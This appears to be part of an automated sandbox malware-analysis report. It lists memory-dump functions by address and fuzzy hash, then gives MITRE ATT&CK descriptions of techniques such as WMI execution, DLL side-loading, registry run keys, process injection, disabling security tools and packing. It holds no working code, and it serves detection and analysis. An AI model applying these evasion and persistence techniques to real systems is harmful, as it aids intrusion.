Instruction ID: 3ded7bef69c7a6d955ab743c0591608054687384ecfcdfae27e40e5acb5aead2
Opcode Fuzzy Hash: 82d5496410ce3bc88fcb9617ec28abb77571cc98215959e16975b32b583bb5c2
Instruction Fuzzy Hash: 8261A621B1DD4E0EEBACFB6894667B972D2EF98340F44437AD41EC31DBEE28A9414341

Function 00007FFD9B8D7080 Relevance: .1, Instructions: 141COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000039.00000002.2432964494.00007FFD9B8D1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_57_2_7ffd9b8d1000_0J5DzstGPi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c1a030c8e3678f8df5b70ac6ac4edb80e43fcdb07de7527599d25b963468bfaa
Instruction ID: 3d2588a4bcfaebe20bb424550521506312fa8a297f991b8d5329263727f9df20
Opcode Fuzzy Hash: c1a030c8e3678f8df5b70ac6ac4edb80e43fcdb07de7527599d25b963468bfaa
Instruction Fuzzy Hash: F941D667B0D2718AE31EB7ACB8BA8E93790CF4123D70845B7D19D8A0D7FC19508792C9

Function 00007FFD9B8A0C25 Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000039.00000002.2432964494.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_57_2_7ffd9b8a0000_0J5DzstGPi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e54c43c4b23c311d080e1050da0fdcfa8cf84ac643f502a64441070ab598bc40
Instruction ID: 8fe9a509ba9cc93059c4a039948e79d04f2087984129342c996e95dc95f7f497
Opcode Fuzzy Hash: e54c43c4b23c311d080e1050da0fdcfa8cf84ac643f502a64441070ab598bc40
Instruction Fuzzy Hash: 77316931B1E68DCEE726ABA898651EC7B60EF46314F0542F3D04C8B1D3DA38264687A1

Function 00007FFD9B8A11A1 Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000039.00000002.2432964494.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_57_2_7ffd9b8a0000_0J5DzstGPi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4a1fda32e2d57c0d069c582c35d60ddefc69fa52a44bcc35dce966952653ebcf
Instruction ID: a0926a27e0010d5070a733ff830b82d8ffe974a676d819ebdf48e6dcf718f171
Opcode Fuzzy Hash: 4a1fda32e2d57c0d069c582c35d60ddefc69fa52a44bcc35dce966952653ebcf
Instruction Fuzzy Hash: 25318630A0964E8FDB49EB64C8659B97BF0FF5B310B0505FAC059D72B2DB38A941CB50

Function 00007FFD9B8B478C Relevance: .1, Instructions: 91COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000039.00000002.2432964494.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_57_2_7ffd9b8b0000_0J5DzstGPi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 28b1389d6250fe0ebb7a7a4fa07ec3ba949460569f0633f714a46f6967729fed
Instruction ID: 7ff54094019bc8e9db6df29c60352321056790d8808e4711f42f2b121851d462
Opcode Fuzzy Hash: 28b1389d6250fe0ebb7a7a4fa07ec3ba949460569f0633f714a46f6967729fed
Instruction Fuzzy Hash: EE31B12190E7DD4FD7268B789C615A67FB0EF47310F0A41EBD489CB1E3DA28690AC791

Function 00007FFD9B8D70F8 Relevance: .1, Instructions: 88COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000039.00000002.2432964494.00007FFD9B8D1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_57_2_7ffd9b8d1000_0J5DzstGPi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ce84b899081ee813f7e2fba305941967b9a4128af5b41c6285cb14c23b50cfe3
Instruction ID: 0f7685919ecd539ea9c141186e273a6506092dccb175dd3ef4881c84ad13fd98
Opcode Fuzzy Hash: ce84b899081ee813f7e2fba305941967b9a4128af5b41c6285cb14c23b50cfe3
Instruction Fuzzy Hash: 0621D716B0927186E31E77AC7DBA8E93B90CF4133D70845B7E05D4B0D7EC59508B9285

Function 00007FFD9B8D29BA Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000039.00000002.2432964494.00007FFD9B8D1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_57_2_7ffd9b8d1000_0J5DzstGPi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 77e2874542b3ec4f8572180651af5da4a09c8e107194b51776089815e0c27031
Instruction ID: c5a33267e96ed355fab2700b27211989d313a439948526b596567a8531706f1d
Opcode Fuzzy Hash: 77e2874542b3ec4f8572180651af5da4a09c8e107194b51776089815e0c27031
Instruction Fuzzy Hash: E2116372B0991E8FDBA9EF48D4646A83391EB98750F05037BD419D3299DE286D428780

Function 00007FFD9B8B6B7A Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000039.00000002.2432964494.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_57_2_7ffd9b8b0000_0J5DzstGPi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c0f699f327781b06f60bbbf4668701de725ee8a67a3ed87453a135dcc411ed1a
Instruction ID: f289f2ce29b53b8268334d22f14c390b2a64efda893e7922b03486ce1f79ab06
Opcode Fuzzy Hash: c0f699f327781b06f60bbbf4668701de725ee8a67a3ed87453a135dcc411ed1a
Instruction Fuzzy Hash: 1311A962B1E92E4FEBB4DFA894A06A463A2FF9C310B554676C01DC72D6DD28FD014BC0

Function 00007FFD9B8D7148 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000039.00000002.2432964494.00007FFD9B8D1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_57_2_7ffd9b8d1000_0J5DzstGPi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e8e3c9983f81462a06e756fe1438ec6fc85b4fb7107188a59e75f4fd7ab309e
Instruction ID: c5aa55904e75ff0012aaf9fd94870b6a990676c6e1f2973b2d0ad5e683f2f5b1
Opcode Fuzzy Hash: 6e8e3c9983f81462a06e756fe1438ec6fc85b4fb7107188a59e75f4fd7ab309e
Instruction Fuzzy Hash: 3001D816A0917187D31E777C7CBA8E93790CF0222D70845F7E05D4B0D7EC5954879285

Function 00007FFD9B8A0C40 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000039.00000002.2432964494.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_57_2_7ffd9b8a0000_0J5DzstGPi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 35caaa981f24a8201b3045b746b27f69ee1e883bf5ba3df446012054019ddc15
Instruction ID: e47169b9c6d0ed0f1c04c4a2d782118bbb9f5ef04b0c356d63e1c5b1e1b1fcee
Opcode Fuzzy Hash: 35caaa981f24a8201b3045b746b27f69ee1e883bf5ba3df446012054019ddc15
Instruction Fuzzy Hash: AF11A531F1E68D8FE712DBA8886519C7FB0EF56710F0645F7C048DB1E2D938664587A0

Function 00007FFD9B8DD151 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000039.00000002.2432964494.00007FFD9B8D1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_57_2_7ffd9b8d1000_0J5DzstGPi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4697d1fc112b6eab6debc78e53adfbc00ce63081ae18bd8ef8f564facadca256
Instruction ID: 2c3535fd7898970757f4f3f4270df072a0c44e6257b5552326e0acd86a0a941b
Opcode Fuzzy Hash: 4697d1fc112b6eab6debc78e53adfbc00ce63081ae18bd8ef8f564facadca256
Instruction Fuzzy Hash: 07F02B22B0F68A1FEB32939999B02A4B790EBD9360F0543B3C495CB1E3D80C1ADA4351

Function 00007FFD9B8B46F1 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000039.00000002.2432964494.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_57_2_7ffd9b8b0000_0J5DzstGPi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c08d7a938932a2d820cd091ad037ce8e19c3702a5cb6595cb864043400ea045d
Instruction ID: d3c176a15e173d884c9759cec4f9144917b5bc436595636245ff52df9290dede
Opcode Fuzzy Hash: c08d7a938932a2d820cd091ad037ce8e19c3702a5cb6595cb864043400ea045d
Instruction Fuzzy Hash: E8F0F931B0E69D4BE721976888256A93791AB96311F0E03BBC089C71E3DD1C96468795

Function 00007FFD9B8DD88E Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000039.00000002.2432964494.00007FFD9B8D1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_57_2_7ffd9b8d1000_0J5DzstGPi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3a3148005d22dd9d5468de8fa3d91edd5d9c8c7d39aa97947eae1c66948c2803
Instruction ID: c6b0db1fb9f8014ce690f04eb6d96ce10e7716dcc1d125aa3ba0cea38157954f
Opcode Fuzzy Hash: 3a3148005d22dd9d5468de8fa3d91edd5d9c8c7d39aa97947eae1c66948c2803
Instruction Fuzzy Hash: 48017C30F0951E8FEB65DA9D88513FD73A2EFD8301F11863AD008975C5CA3AAD46C740

Function 00007FFD9B8D3669 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000039.00000002.2432964494.00007FFD9B8D1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_57_2_7ffd9b8d1000_0J5DzstGPi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d791e30b96496ba776b077c83a1f62cd24f189d64707d0937862b47dd4d260af
Instruction ID: 342b7501707e9def621f05e782a5ad1602cc297a62496b4a9b5cb48a5371c943
Opcode Fuzzy Hash: d791e30b96496ba776b077c83a1f62cd24f189d64707d0937862b47dd4d260af
Instruction Fuzzy Hash: 49F0E231B1EBC80FC7159B298825025BFF1EFAB60174906EFC0C6C76A2DA58EC468342

Function 00007FFD9B8B849F Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000039.00000002.2432964494.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_57_2_7ffd9b8b0000_0J5DzstGPi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 96268beca996785c5e9a96cfe5d7f27663e0233f5bf5d07b38c8090bbb1f2d9e
Instruction ID: fe31319d51edb7b421304fbb367358a7c95aee5cadff7403a534f6045f3b5330
Opcode Fuzzy Hash: 96268beca996785c5e9a96cfe5d7f27663e0233f5bf5d07b38c8090bbb1f2d9e
Instruction Fuzzy Hash: 7CF0F431A0596F8FE310AB6088669E83361EF05314F0542B7C918D72E6EE38AA428AC0

Function 00007FFD9B8B3F98 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000039.00000002.2432964494.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_57_2_7ffd9b8b0000_0J5DzstGPi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b87ea1baa4bddea5b6fc92b06fcfef138e3977b1fd7cd476233ebf26e261218
Instruction ID: 7eb7c08c54878090804db9707852919474decc88fc591d891af76d1d74e8a9b3
Opcode Fuzzy Hash: 9b87ea1baa4bddea5b6fc92b06fcfef138e3977b1fd7cd476233ebf26e261218
Instruction Fuzzy Hash: 33F04F70B0861F8BEB54EB94C8646BD77B1FB54310F004637C419D73A5EF74AA418B80

Function 00007FFD9B8D25E8 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000039.00000002.2432964494.00007FFD9B8D1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_57_2_7ffd9b8d1000_0J5DzstGPi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a6a651a285739add4ced1f2927a9229ac58ff63b9bd9960a91a31756ec143b21
Instruction ID: eec393a8c418e5049599d8bd2f4fe36be8922cc59c1bb3a42e96dce58412e127
Opcode Fuzzy Hash: a6a651a285739add4ced1f2927a9229ac58ff63b9bd9960a91a31756ec143b21
Instruction Fuzzy Hash: 98E02634B24F4C4B8B18AA2D9405072F3D1EBAD206B000B7EA48BD33A0DE20FC414785

Function 00007FFD9B8DD26D Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000039.00000002.2432964494.00007FFD9B8D1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_57_2_7ffd9b8d1000_0J5DzstGPi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4fd71dbc1ef2f61cca37e047f6b3a3adf4945e3428bf25ebd70a10c360ece8b4
Instruction ID: 7d3edd67dbfd65c95e4a8286d3e73179d7527ead238759bd7e538790cec9bb0a
Opcode Fuzzy Hash: 4fd71dbc1ef2f61cca37e047f6b3a3adf4945e3428bf25ebd70a10c360ece8b4
Instruction Fuzzy Hash: 6FF03031B0A50E9BEB75D784C4B4BB87285DBDC365F124337C51A871F5CE2C6A948740

Function 00007FFD9B8DD1E1 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000039.00000002.2432964494.00007FFD9B8D1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_57_2_7ffd9b8d1000_0J5DzstGPi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab409e2c6943ef10701fa55b7d9cd3e38d84cf791b136d17bbdd5e7bc3135bb7
Instruction ID: 9910dc59c7681ce211b9c23681644d1c80793f70f9ef1da5f0875f5d7768d2b1
Opcode Fuzzy Hash: ab409e2c6943ef10701fa55b7d9cd3e38d84cf791b136d17bbdd5e7bc3135bb7
Instruction Fuzzy Hash: DEF03031B0A60EABEB71D790C8A0BB872D1EBDC365F524337C51A871E5CE2C6A858740

Function 00007FFD9B8D2239 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000039.00000002.2432964494.00007FFD9B8D1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_57_2_7ffd9b8d1000_0J5DzstGPi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e2ae13ce6a6ee6a0908b7d9db42a8d9aa3fd604ae6b989d1983f4bcf62c0a1a6
Instruction ID: 9e729e07f31cc618846bad50ff41edd6130839203270798c1f6d289dcec69168
Opcode Fuzzy Hash: e2ae13ce6a6ee6a0908b7d9db42a8d9aa3fd604ae6b989d1983f4bcf62c0a1a6
Instruction Fuzzy Hash: 59E06D3160E3C08FCB16EB3488A88547F60EF6720174A42EEC046CF1A3DA2DCC8ACB11

Function 00007FFD9B8A0CB9 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000039.00000002.2432964494.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_57_2_7ffd9b8a0000_0J5DzstGPi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ec55e8a35bd852a93972f94df518aefd9c0637e9235d96271aa534e1d33e9046
Instruction ID: de3b9fc1440b5c1917ac3db9db7d586f9515b07158eb863917d5a9fe8c2a27a5
Opcode Fuzzy Hash: ec55e8a35bd852a93972f94df518aefd9c0637e9235d96271aa534e1d33e9046
Instruction Fuzzy Hash: 64F0E230B1A60ACBF724DB84C4A47E877A0FF55700F0442B6D01C872E5DA7866C4CB50

Function 00007FFD9B8D7C49 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000039.00000002.2432964494.00007FFD9B8D1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_57_2_7ffd9b8d1000_0J5DzstGPi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 56c87d739f00b53c15f94623dcc517deffc459bf9238206eba9ec651426cd43d
Instruction ID: f160c4e5853438ff293a96d2b1f13edb459cf4b2d412218015b36ab9984a4bee
Opcode Fuzzy Hash: 56c87d739f00b53c15f94623dcc517deffc459bf9238206eba9ec651426cd43d
Instruction Fuzzy Hash: 44E04F21A5E7C04FC30A67348C658543FB0AF6721174A00D7D045CF1B3D51DDC48C712

Function 00007FFD9B8DDAA9 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000039.00000002.2432964494.00007FFD9B8D1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_57_2_7ffd9b8d1000_0J5DzstGPi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 097c20667c3010414a608223938d2375638a87cef1bae08b8ec9eb01c319fa32
Instruction ID: 83e21699145eb6543023195c6a14e12ecfc6d6101de04f0eac1577c0575128cf
Opcode Fuzzy Hash: 097c20667c3010414a608223938d2375638a87cef1bae08b8ec9eb01c319fa32
Instruction Fuzzy Hash: B3E01A2194F7C44FCB0B9B3588789403F71EE5761074A52EBC085CF1B3D9199849C701

Function 00007FFD9B8DA450 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000039.00000002.2432964494.00007FFD9B8D1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_57_2_7ffd9b8d1000_0J5DzstGPi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80

Function 00007FFD9B8DA3C0 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000039.00000002.2432964494.00007FFD9B8D1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_57_2_7ffd9b8d1000_0J5DzstGPi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80

Function 00007FFD9B8D9269 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000039.00000002.2432964494.00007FFD9B8D1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_57_2_7ffd9b8d1000_0J5DzstGPi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e061339d33d87973105ec9024924da00b13bd410ea225b23fd45978dac96650
Instruction ID: 20e53023e9db85c9a2229075be09efbd13d5fd25275b428abb07f5ef945d1628
Opcode Fuzzy Hash: 8e061339d33d87973105ec9024924da00b13bd410ea225b23fd45978dac96650
Instruction Fuzzy Hash: 70E0173151A7884FC70B9B3488A99803FB0EE2B21178B01C7E045CF5B3E6199D89CB52

Function 00007FFD9B8DDA29 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000039.00000002.2432964494.00007FFD9B8D1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_57_2_7ffd9b8d1000_0J5DzstGPi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d61057dfc100597e3903c48a67599d8b8aaf37b0b92c9a928ad439cfc7101b3
Instruction ID: a99be2c836b117c9e6940eb7bde7c67351754b39a3ce506bd65d789278e00fcb
Opcode Fuzzy Hash: 7d61057dfc100597e3903c48a67599d8b8aaf37b0b92c9a928ad439cfc7101b3
Instruction Fuzzy Hash: 3FE04F2294F7C04FCB0B973488789447F60EE5721478A41EBC085CF1B3EA298C49C701

Function 00007FFD9B8D22E0 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000039.00000002.2432964494.00007FFD9B8D1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_57_2_7ffd9b8d1000_0J5DzstGPi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
Instruction ID: 8f180aab2aa75e9180ee0f7869d42a8d0eff98467748f81fc95ef1229aac25a4
Opcode Fuzzy Hash: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
Instruction Fuzzy Hash: D2D01230750D084F8B4CF63C885996033D1E76D2167854059D00AC72B1E966DC89C741

Function 00007FFD9B8DBAC0 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000039.00000002.2432964494.00007FFD9B8D1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_57_2_7ffd9b8d1000_0J5DzstGPi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6464a67ff091a827812a2cc836056040b56cb53019a2fd92ee05ee6071b52477
Instruction ID: 95231c77d7231b4fb71312c48f3a55c65f0bf1e14b64b0f35652b9df335e6600
Opcode Fuzzy Hash: 6464a67ff091a827812a2cc836056040b56cb53019a2fd92ee05ee6071b52477
Instruction Fuzzy Hash: 97D01234B959044FC71CA738C8598747391EBEE21679541A9D00BCB2B2D96ADD89C741

Function 00007FFD9B8D71A0 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000039.00000002.2432964494.00007FFD9B8D1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_57_2_7ffd9b8d1000_0J5DzstGPi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 698c49afc8ca5cc73860eef67dc2ba156b1e02b6bd2318f1785a3056c5b136f8
Instruction ID: 2173bbbda4ed8d4323b028cfbfee92f2ff7d5f6760fb87ec278bd57f1a42cb7b
Opcode Fuzzy Hash: 698c49afc8ca5cc73860eef67dc2ba156b1e02b6bd2318f1785a3056c5b136f8
Instruction Fuzzy Hash: B9D01234B519084FC71CA7388899C747391EBAE216BD541A9D00AD73B1D96ADD89C741

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

